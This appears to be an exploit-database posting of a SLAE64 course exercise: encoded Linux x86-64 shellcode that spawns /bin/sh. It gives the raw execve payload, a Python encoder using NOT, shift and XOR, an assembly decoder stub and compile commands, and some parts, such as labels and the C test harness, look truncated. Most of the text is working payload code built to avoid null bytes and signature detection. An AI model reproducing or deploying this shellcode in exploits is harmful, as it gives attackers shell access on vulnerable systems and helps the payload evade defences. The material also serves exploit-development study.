Linux/x86 not +shiftn+ xorn encoded /bin/sh shellcode (168 bytes) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-07-29 |
Type : shellcode |
Platform : linux_x86-64
[+] Code ...
######################################## description ########################################
; Title : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
; Author : Pedro Cabral
; Twitter : @CabrallPedro
; LinkedIn :
; SLAE ID : SLAE64 - 1603
; Purpose : spawn /bin/sh shell
; Tested On : Ubuntu 16.04.6 LTS
; Arch : x64
; Size : 168 bytes
########################################## sh.asm ###########################################
global _start
section .text
xor rax, rax
push rax ; push null
mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
push rbx ; push to the stack
mov rdi, rsp ; store the /bin//sh on rdi
push rax ; push null
mov rdx, rsp ; set rdx
push rdi ; push the address of /bin//sh
mov rsi, rsp ; set rsi
add rax, 59 ; rax = 59 (execve)
#################################### original shellcode #####################################
pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
pedro@ubuntu>ld -N -o sh sh.o
pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
######################################## ########################################
import sys
if len(sys.argv) != 3:
print "Usage : python <SHIFT number> <XOR number>"
shift = int(sys.argv[1])
xor = int(sys.argv[2])
shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
# addition to the inicial of the shellcode the SHIFT and XOR values
encoded_shellcode =""
encoded_shellcode += '0x01' #prevent null bytes on the shellcode
encoded_shellcode += '%02x, ' %shift
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor
# [NOT + SHL-N + XOR-N] encoded shellcode
for i in bytearray(shellcode):
new = ~i & 0xff
new = new << shift
new = new ^ xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %new
# end of shellcode
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x' %xor
# print encoded shellcode
print encoded_shellcode
#################################### Encoded Shellcode #####################################
pedro@ubuntu>python 4 1337
0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
####################################### decoder.asm ########################################
global _start
section .text
jmp decoder
encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
lea rsi, [rel encoded]
xor rcx, rcx
xor r9,r9
xor r10,r10
mov word cx, [rsi]
inc rsi
inc rsi
mov word r9w, [rsi]
inc rsi
inc rsi
push rsi
mov rdi, rsi
main: ; to deal with 0xff on the original shellcode
mov word r10w,[rsi]
xor r10w, r9w
jz second_check
shr r10, cl
not word r10w
mov byte [rdi], r10b
inc rsi
inc rsi
inc rdi
jmp short main
mov word r10w, [rsi+2]
xor r10w, r9w
jz call_encoded
mov word r10w, [rsi]
xor r10w, r9w
jmp main2
call [rsp]
###################################### final shellcode ######################################
pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
Shellcode Length: 168
$ whoami
unsigned char code[] = \
void main(){
printf("Shellcode Length: %zu\n",strlen(code));
int (*ret)() = (int(*)())code;